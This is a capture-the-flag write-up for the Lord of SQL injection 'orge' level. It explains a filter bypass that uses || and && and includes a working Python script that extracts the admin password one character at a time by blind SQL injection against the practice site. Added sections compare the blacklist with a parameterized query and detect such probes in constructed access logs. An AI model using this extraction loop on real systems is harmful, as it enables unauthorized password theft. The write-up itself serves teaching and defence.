
[Lord of SQL injection] orge

Source code analysis

if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");

if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");

On top of the earlier Blind challenge, the keywords 'or' and 'and' are now blocked as well.


$query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'";

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge");

This is a Blind SQL injection challenge where we have to recover admin's pw.

So we only need to swap 'and' for && and 'or' for ||.
The script used in the earlier challenge works with a small modification.
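As an added illustration (not part of this writeup), the Python below applies the challenge's two blacklist patterns to the old payload and to the ||/&& form, shows the query string that concatenation produces, and puts a parameterized lookup beside it. The table and its rows are constructed; SQLite is used only for the parameterized side because, unlike MySQL, it treats || as string concatenation rather than OR, so the concatenated query is shown as text only.

```python
import re
import sqlite3

# The two blacklist patterns from the orge challenge source, unchanged.
FILTERS = [
    re.compile(r'prob|_|\.|\(\)', re.IGNORECASE),
    re.compile(r'or|and', re.IGNORECASE),
]

def passes_filter(pw: str) -> bool:
    """True if the challenge's blacklist would let this pw value through."""
    return not any(f.search(pw) for f in FILTERS)

def build_vulnerable_query(pw: str) -> str:
    """The query the challenge builds by string concatenation (MySQL dialect).
    Returned as text only: SQLite below reads || as concatenation, not OR."""
    return f"select pw from prob_orge where id='admin' and pw='{pw}'"

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for prob_orge; the rows are made up."""
    conn = sqlite3.connect(':memory:')
    conn.execute("create table prob_orge (id text, pw text)")
    conn.execute("insert into prob_orge values ('admin', 'constructed-secret')")
    conn.execute("insert into prob_orge values ('guest', 'guest')")
    return conn

def safe_lookup(conn: sqlite3.Connection, pw: str):
    """Hardened form: pw is bound as a parameter, so it is data, never SQL."""
    row = conn.execute(
        "select pw from prob_orge where id='admin' and pw=?", (pw,)
    ).fetchone()
    return row[0] if row else None

def check_login(conn: sqlite3.Connection, pw: str) -> bool:
    """Same acceptance test as the challenge's solve() condition, on top of safe_lookup."""
    stored = safe_lookup(conn, pw)
    return bool(stored) and stored == pw

# Payloads: the form the earlier challenges used (now blocked) and the form this writeup uses.
BLOCKED_PAYLOAD = "' or length(pw)=17 and id='admin"
BYPASS_PAYLOAD = "' || length(pw)=17 && id='admin"

if __name__ == '__main__':
    db = make_db()
    print('blocked payload passes filter:', passes_filter(BLOCKED_PAYLOAD))
    print('bypass payload passes filter: ', passes_filter(BYPASS_PAYLOAD))
    print('concatenated query:', build_vulnerable_query(BYPASS_PAYLOAD))
    print('parameterized lookup with bypass payload:', safe_lookup(db, BYPASS_PAYLOAD))
    print('login with real pw:', check_login(db, 'constructed-secret'))
```

The point of the pairing: the regex filter is a guess at the attacker's vocabulary and misses the operator spellings, whereas the bound parameter never lets the value reach the parser as SQL, so no spelling matters.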


import http.client
from urllib.parse import quote

result = ''
leng = 0
header = {'Cookie': ' '}  # put the session cookie here
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

# Step 1: find the length of admin's pw with ' || length(pw)=N && id='admin
for i in range(1, 100):
    length = ('/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27%20||%20length(pw)='
              + str(i) + '%20%26%26%20id=%27admin')
    conn = http.client.HTTPConnection('los.eagle-jump.org')
    conn.request('GET', length, '', header)
    data = conn.getresponse().read()
    if "Hello admin" in data.decode():
        leng = i
        print("pw length: " + str(i))
        break

# Step 2: recover one character at a time with ' || substr(pw,i,1)='c' && id='admin
for i in range(1, leng + 1):
    for j in range(0, len(string)):
        # percent-encode the candidate so characters such as #, & and % do not break the URL
        substr = ('/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27%20||%20substr(pw,'
                  + str(i) + ',1)=%27' + quote(string[j], safe='') + '%27%26%26%20id=%27admin')
        conn = http.client.HTTPConnection('los.eagle-jump.org')
        conn.request('GET', substr, '', header)
        data = conn.getresponse().read()
        if 'Hello admin' in data.decode():
            result = result + string[j]
            print('substr(pw,' + str(i) + ',1)= ' + str(string[j]))
            break

print('Password is ' + result)
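Seen from the server side, a loop like the one above leaves a very regular footprint: a single client sending dozens of requests to the same page whose pw parameter contains length(...) or substr(...) with an incrementing position. The following Python is an added example (not from the writeup) that parses a few constructed access log lines in the common log format, URL-decodes the query string and flags any client/path pair that crosses a probe threshold. The log lines, client addresses and threshold are made up for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access log lines mimicking the blind-extraction loop; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [24/May/2017:10:00:01 +0900] "GET /orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27%20||%20length(pw)=1%20%26%26%20id=%27admin HTTP/1.1" 200 512
203.0.113.5 - - [24/May/2017:10:00:02 +0900] "GET /orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27%20||%20length(pw)=2%20%26%26%20id=%27admin HTTP/1.1" 200 512
203.0.113.5 - - [24/May/2017:10:00:03 +0900] "GET /orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27%20||%20substr(pw,1,1)=%270%27%26%26%20id=%27admin HTTP/1.1" 200 512
203.0.113.5 - - [24/May/2017:10:00:04 +0900] "GET /orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27%20||%20substr(pw,1,1)=%271%27%26%26%20id=%27admin HTTP/1.1" 200 512
203.0.113.5 - - [24/May/2017:10:00:05 +0900] "GET /orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27%20||%20substr(pw,2,1)=%27a%27%26%26%20id=%27admin HTTP/1.1" 200 512
198.51.100.7 - - [24/May/2017:10:00:06 +0900] "GET /orge_40d2b61f694f72448be9c97d1cea2480.php?pw=hunter2 HTTP/1.1" 200 480
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# Boolean-oracle probe signature: a string/length function applied to a column.
PROBE_RE = re.compile(r'\b(length|substr|substring|ascii|mid)\s*\(', re.IGNORECASE)

def parse_line(line):
    """Return (client_ip, path, decoded query params) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    params = parse_qs(parts.query, keep_blank_values=True)
    return m.group('ip'), parts.path, params

def is_probe(params):
    """True if any parameter value carries a blind-injection oracle expression."""
    return any(PROBE_RE.search(unquote(v)) for values in params.values() for v in values)

def find_blind_sqli(log_text, threshold=3):
    """Count oracle-style probes per (client, path) and return those at or above threshold."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, params = parsed
        if is_probe(params):
            counts[(ip, path)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}

if __name__ == '__main__':
    for (ip, path), n in find_blind_sqli(SAMPLE_LOG).items():
        print(f'{ip} sent {n} blind-injection probes to {path}')
```

The threshold is deliberately low here because the sample is short; on real traffic you would pair the count with a time window, and the request rate from one client to one endpoint (one request per candidate character) is usually the stronger signal than any single query string.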


